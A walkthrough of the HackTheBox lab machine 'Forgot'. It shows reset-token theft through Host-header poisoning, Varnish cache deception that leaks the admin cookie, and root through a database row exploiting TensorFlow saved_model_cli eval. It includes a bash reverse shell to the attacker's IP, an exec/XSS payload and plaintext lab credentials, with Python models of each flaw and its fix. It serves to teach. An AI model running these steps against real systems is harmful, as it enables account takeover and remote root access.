Forgot

Forgot is a medium-difficulty Linux machine from HackTheBox created by MrR3boot. This box is pretty confusing and pretty slow; you need a lot of patience to complete it. In this post my IP is 10.10.14.18 and the target's IP is 10.129.228.104.

Gathering Information

This step is always the same: ping the machine to see if it is alive, then use Nmap to scan all the ports so nothing surprises you later.

Local Terminal
nmap -p- --open -T5 -v -n 10.129.228.104
Nmap’s output, just a website?
Local Terminal
nmap -sC -sV -p 22,80 10.129.228.104

It’s just a website, but there is something weird about it.

Local Terminal
whatweb http://10.129.228.104
Relevant information: Varnish 6.2. Note it down; once you have explored the site, read up on how Varnish caches responses, because it matters later.
  • Browser: http://10.129.228.104

Main page
Fragment of the main page source code (CTRL+U)

Add this to your notes: {user : robert-dev-14522}. We still don't have much to go on, so the best option is to fuzz the website for more paths.

Local Terminal
wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirb/big.txt http://10.129.228.104/FUZZ
home, tickets, and reset. Interesting.

My target machine blew up, so I got a new target IP: 10.129.219.117

  • Browser: http://10.129.219.117/forgot

The reset form sends the user a link, and that link is built from the Host header of our request. If we change that header, the link points at us instead of the site, and whoever (or whatever) follows it hands us the token. You need one terminal for a listener, Burp Suite to edit the request, and your browser.

User Interception Step

First, take the current username (robert-dev-<number>) from http://10.129.219.117 with view-source (CTRL+U), or with: curl -s http://10.129.219.117/ | grep "Q1 release fix by"

Local Terminal
nc -lvnp 443
  • Burpsuite: {Intercept ON}

  • Browser: {username: robert-dev-14522} {PRESS RESET}

  • Burpsuite: Change the Host header to your IP address and netcat port, e.g. 10.10.14.18:443

Burpsuite modification
  • Burpsuite: {Press Forward}

  • Burpsuite: {Intercept OFF}

Wait around 1-2 minutes; netcat will receive a request for the reset link. Copy the token URL and open it against the real target:
  • Browser: http://10.129.219.117/reset?token=iATub9koGT1P79mowK2i%2B7zoJgnmsxWu1Fo4jWi0gPv8laTB3SzWbEPr8Om53r7Gcqt1Mu6U%2Bh4XqhSp7HoJ8A%3D%3D

Change password to anything (Here: pass123)
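Why changing the Host header works, as an added example that is not part of the original writeup or of the Forgot application's code: a minimal Python model of a reset handler that builds its link from the client's Host header, beside a hardened version that uses a configured host and rejects anything else, plus a helper that turns the request netcat receives back into the reset URL on the real target. The canonical host, the listener address and the captured request are assumptions constructed from the addresses used in this post.

```python
"""Password-reset poisoning via the Host header: vulnerable vs hardened link
construction, and recovery of the token from the request the listener sees.
Added example, not the Forgot application's code."""
from urllib.parse import parse_qs, quote, urlparse

CANONICAL_HOST = "10.129.219.117"   # assumed: the host the app should put in its links
LISTENER = "10.10.14.18:443"        # the netcat listener used in this walkthrough


def reset_link_vulnerable(host_header: str, token: str) -> str:
    """The bug: the link's authority is copied from the client's Host header,
    so 'Host: 10.10.14.18:443' makes the victim open our listener instead."""
    return f"http://{host_header}/reset?token={quote(token, safe='')}"


def reset_link_hardened(host_header: str, token: str) -> str:
    """The fix: the authority comes from configuration, and a Host header
    that does not match the canonical host is rejected outright."""
    if host_header.split(":", 1)[0] != CANONICAL_HOST:
        raise ValueError(f"untrusted Host header: {host_header!r}")
    return f"http://{CANONICAL_HOST}/reset?token={quote(token, safe='')}"


def token_from_captured_request(raw: bytes) -> str:
    """Parses the request line netcat prints ('GET /reset?token=... HTTP/1.1')
    and returns the token, percent-decoded (parse_qs does the decoding)."""
    request_line = raw.split(b"\r\n", 1)[0].decode("ascii")
    method, target, _version = request_line.split(" ", 2)
    if method != "GET":
        raise ValueError(f"unexpected method {method!r}")
    params = parse_qs(urlparse(target).query, strict_parsing=True)
    return params["token"][0]


def real_reset_url(raw: bytes) -> str:
    """Re-encodes the recovered token into the URL to open against the target."""
    token = token_from_captured_request(raw)
    return f"http://{CANONICAL_HOST}/reset?token={quote(token, safe='')}"


# Constructed sample of what the listener receives; the token is the one shown above.
CAPTURED = (
    b"GET /reset?token=iATub9koGT1P79mowK2i%2B7zoJgnmsxWu1Fo4jWi0gPv8laTB3SzWbEPr8Om53r7G"
    b"cqt1Mu6U%2Bh4XqhSp7HoJ8A%3D%3D HTTP/1.1\r\n"
    b"Host: 10.10.14.18:443\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print("poisoned link:", reset_link_vulnerable(LISTENER, "example-token"))
    try:
        reset_link_hardened(LISTENER, "example-token")
    except ValueError as exc:
        print("hardened handler:", exc)
    print("open this on the target:", real_reset_url(CAPTURED))
```

The hardened variant is the check to look for when reviewing a reset flow: the link must never be assembled from request-controlled data, and a mismatched Host header is a reason to refuse the request rather than to serve it.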

Now we have to login.

  • Browser: http://10.129.219.117

Home Portal

This machine has a timer that changes the numeric suffix of the "robert-dev" username, and the reset fails if you are slow. If that happens, repeat everything from "User Interception Step".

Login through SSH

This version of Varnish is configured to cache responses (this was hard to find); we abuse that to capture the administrator's session cookie and, from there, the credentials to log in directly over SSH.

view-source of home: /admin_tickets looks like an important endpoint

First, we submit a ticket whose URL points at the target itself plus a made-up path. The best place is /static/, where the .js files live, because Varnish caches everything under it. When the administrator opens the link, the response (cookie included) gets cached, and we read the admin's cookie back from the fictional page to get into /admin_tickets.

  • Browser: http://10.129.219.117/escalation

Submit!

Here you have to wait around two or three minutes. Meanwhile, you can grab your own user cookie for comparison by intercepting a request such as http://10.129.219.117/escalation in Burp Suite while logged in.

After waiting, we can get the cookie from the fictional page:

Local Terminal
curl -I http://10.129.219.117/static/directory
Admin cookie. If this fails, repeat by submitting a new ticket with a new folder name.
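What the cache is doing during that wait, as an added example (not Varnish's VCL and not the Forgot application's code): a toy cache in Python that applies two policies to the same origin. The weak policy caches everything under /static/, headers included, which is what lets the administrator's Set-Cookie come back from our curl -I. The hardened one behaves like Varnish's built-in vcl_backend_response, which refuses to cache any response carrying Set-Cookie, and additionally caches only successful responses for real asset types. The origin's behaviour in the model (re-issuing the caller's session cookie on every response, 404s included) and the session values are assumptions.

```python
"""Toy model of the cache-deception step: a cache in front of an origin,
with the weak policy that leaks the admin's cookie and a hardened one.
Added example, not Varnish's VCL or the Forgot application's code."""
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class Response:
    status: int
    headers: Dict[str, str]
    body: str


class Origin:
    """Stand-in for the web app behind the cache. Assumption for this model:
    it re-issues the caller's session cookie on every response, including
    the 404 for a made-up path such as /static/directory."""

    def handle(self, path: str, session: str) -> Response:
        headers = {"Set-Cookie": f"session={session}; Path=/; HttpOnly"}
        if path.startswith("/static/") and path.endswith(".js"):
            return Response(200, {**headers, "Content-Type": "application/javascript"}, "// real asset")
        if path.startswith("/static/"):
            return Response(404, headers, "Not Found")
        return Response(200, {**headers, "Content-Type": "text/html"}, "<html>app page</html>")


Policy = Callable[[str, Response], bool]


def weak_policy(path: str, resp: Response) -> bool:
    """Cache everything under /static/, status and headers included."""
    return path.startswith("/static/")


def hardened_policy(path: str, resp: Response) -> bool:
    """Mirror Varnish's built-in rule: never cache a response that sets a
    cookie, and only cache successful responses for real asset types."""
    if not path.startswith("/static/") or resp.status != 200:
        return False
    if "Set-Cookie" in resp.headers:
        return False
    return path.rsplit(".", 1)[-1].lower() in {"js", "css", "png", "svg", "woff2"}


class Cache:
    def __init__(self, origin: Origin, policy: Policy) -> None:
        self.origin = origin
        self.policy = policy
        self.store: Dict[str, Response] = {}   # keyed on path only, like a URL-keyed cache

    def fetch(self, path: str, session: str) -> Response:
        if path in self.store:
            return self.store[path]              # HIT: served to whoever asks next
        resp = self.origin.handle(path, session)
        if self.policy(path, resp):
            self.store[path] = resp
        return resp


def leaked_cookie(policy: Policy, path: str = "/static/directory") -> Optional[str]:
    """Replays the ticket trick: the admin follows the submitted link first,
    then we request the same path (our curl -I). Returns the Set-Cookie
    value we receive if it belongs to the admin, else None."""
    cache = Cache(Origin(), policy)
    cache.fetch(path, session="ADMIN-SESSION")                  # admin opens the ticket URL
    ours = cache.fetch(path, session="ATTACKER-SESSION")        # our request a minute later
    cookie = ours.headers.get("Set-Cookie", "")
    return cookie if "ADMIN-SESSION" in cookie else None


if __name__ == "__main__":
    print("weak policy leaks:", leaked_cookie(weak_policy))
    print("hardened policy leaks:", leaked_cookie(hardened_policy))
```

The point to take from the model is that the cache key is the path alone, so whatever the first visitor's response contained is what every later visitor gets; the only safe rule is to refuse to cache anything that is tied to a session.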

Now that we have the administrator's cookie, we use Burp Suite to swap it in on the request to /admin_tickets:

  • Burpsuite {Intercept ON}

  • Browser: http://10.129.219.117/admin_tickets

  • Burpsuite {Replace Cookie}

  • Burpsuite {Forward}

  • Burpsuite {Intercept OFF}

And we are in! Look, there is a ticket about an SSH issue.

We have to try these credentials, but first notice that the rendered page capitalizes the first letter of everything, so we take the exact values from the page source:

view:source of /admin_tickets… {diego:dCb#1!x0%gjq}
Local Terminal
ssh diego@10.129.219.117                     #password: dCb#1!x0%gjq

Now our local terminal [Term] is a target terminal as Diego [Diego].

Get the user.txt

Privilege Escalation

Now we want to become root. First, check what we can execute as root with sudo:

Target Terminal Diego
sudo -l
Target Terminal Diego
cat /opt/security/ml_security.py

Reading the code, two things stand out: it reads rows from a MySQL database, and it hands them to TensorFlow's saved_model_cli. The TensorFlow version installed evaluates --input_exprs values as Python expressions, so a row containing exec(...) lets us run a bash script of ours as root. I found an explanation and steps from this post.

It’s connected to SQL! Nice.
Target Terminal Diego
mysql -u diego -p          #pass: dCb#1!x0%gjq
Target Terminal Diego (SQL)
SHOW DATABASES;
use app;
show tables;
SELECT * from users;
app's Tables
Content of users table

Still, I couldn’t do anything else with this information…

Target Terminal Diego
cd /dev/shm
vi script.sh
Content of script.sh
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.18/443 0>&1
Target Terminal Diego
chmod 777 script.sh
mysql -u diego -p                 #pass: dCb#1!x0%gjq

From here, we need three terminals: two connected to the target as Diego, one for the MySQL queries [MySQL] and the other to execute ml_security.py [Diego], plus one local terminal [Term] for the listener.

Target Terminal [MySQL]
use app;
insert into escalate values ("TEXT","TEXT","TEXT",'hello=exec("""\nimport os\nos.system("/dev/shm/script.sh")\nprint("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');
Local Terminal [Term]
nc -nlvp 443
Target Terminal [Diego]
sudo /opt/security/ml_security.py
Now [Term] is [Root]
Target Root
cd /root
ls
cat root.txt
Root flag!
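Why the escalate row runs code, as an added example (not TensorFlow's code and not ml_security.py): a simplified model of how saved_model_cli parsed --input_exprs before the fix, with each name=expr value handed to Python's eval(), beside the ast.literal_eval parsing later versions use. The payload has the same shape as the row inserted above, with the reverse shell replaced by a marker so it runs harmlessly; the function names are my own.

```python
"""Simplified model of saved_model_cli's --input_exprs parsing: the old
eval()-based behaviour that turns the escalate row into code execution,
next to the ast.literal_eval parsing later TensorFlow versions use.
Added example, not TensorFlow's or ml_security.py's code."""
import ast
from typing import Any, Dict, Iterator, List, Tuple

EXECUTED: List[str] = []   # side-effect log standing in for the reverse shell


def _split_items(arg: str) -> Iterator[Tuple[str, str]]:
    """'name=expr;name2=expr2' -> (name, expr) pairs; both parsers share this."""
    for item in filter(None, arg.split(";")):
        if "=" not in item:
            raise ValueError(f"--input_exprs item has no '=': {item!r}")
        name, expr = item.split("=", 1)
        yield name, expr


def parse_input_exprs_unsafe(arg: str) -> Dict[str, Any]:
    """Old behaviour: every expression goes through eval(), so it may call
    anything, including exec() with a multi-line program inside."""
    parsed: Dict[str, Any] = {}
    for name, expr in _split_items(arg):
        parsed[name] = eval(expr)   # the modelled bug: arbitrary code runs here
    return parsed


def parse_input_exprs_safe(arg: str) -> Dict[str, Any]:
    """Fixed behaviour: ast.literal_eval accepts only literals (numbers,
    strings, lists, dicts, ...) and rejects calls, names and attributes."""
    parsed: Dict[str, Any] = {}
    for name, expr in _split_items(arg):
        try:
            parsed[name] = ast.literal_eval(expr)
        except (ValueError, SyntaxError) as exc:
            raise ValueError(f"rejected non-literal expression for {name!r}: {expr!r}") from exc
    return parsed


# Same shape as the escalate row above; the os.system() call is replaced by a marker.
PAYLOAD = (
    'hello=exec("""\n'
    "import os\n"
    'EXECUTED.append(f"would run /dev/shm/script.sh as pid {os.getpid()}")\n'
    '""")'
)

if __name__ == "__main__":
    print("unsafe parser returned:", parse_input_exprs_unsafe(PAYLOAD))
    print("side effect recorded:", EXECUTED)
    try:
        parse_input_exprs_safe(PAYLOAD)
    except ValueError as exc:
        print("safe parser:", exc)
```

The unsafe parser returns {'hello': None} because exec() evaluates to None, but by then the embedded program has already run; that is exactly the shape of the row in the escalate table, which is why the script needs only a database write, not a file write, to reach root.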
